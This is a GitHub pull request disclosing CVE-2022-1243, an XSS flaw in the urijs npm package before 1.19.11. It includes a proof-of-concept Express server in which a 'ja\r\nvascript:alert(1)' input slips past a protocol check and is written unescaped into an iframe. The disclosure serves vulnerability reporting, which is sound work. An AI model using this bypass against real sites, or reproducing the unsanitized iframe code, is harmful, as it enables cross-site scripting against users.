Skip to content
This repository has been archived by the owner on Jan 24, 2025. It is now read-only.

fixed @ CVE-2022-1243 #30

Open
wants to merge 1 commit into
base: master
Choose a base branch
from
Open

fixed @ CVE-2022-1243 #30

wants to merge 1 commit into from

Conversation

mik-patient
Copy link

Descriptions :

\r, \n and \t characters in user-input URLs can potentially lead to incorrect protocol extraction when using npm package urijs prior to version 1.19.11. This can lead to XSS when the module is used to prevent passing in malicious javascript: links into HTML or Javascript (see following exploits):

const parse = require('urijs')
const express = require('express')
const app = express()
const port = 3000

input = "ja\r\nvascript:alert(1)"
url = parse(input)

console.log(url)

app.get('/', (req, res) => {
 if (url.protocol !== "javascript:") {res.send("<iframe src=\'" + input + "\'>CLICK ME!</iframe>")}
})

app.listen(port, () => {
 console.log(`Example app listening on port ${port}`)
})

CVE-2022-1243
CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
GHSA-3vjf-82ff-p4r3

Sign up for free to subscribe to this conversation on GitHub. Already have an account? Sign in.
Reviewers
No reviews
Assignees
No one assigned
Labels
None yet
Projects
None yet
Milestone
No milestone
Development

Successfully merging this pull request may close these issues.
1 participant
@mik-patient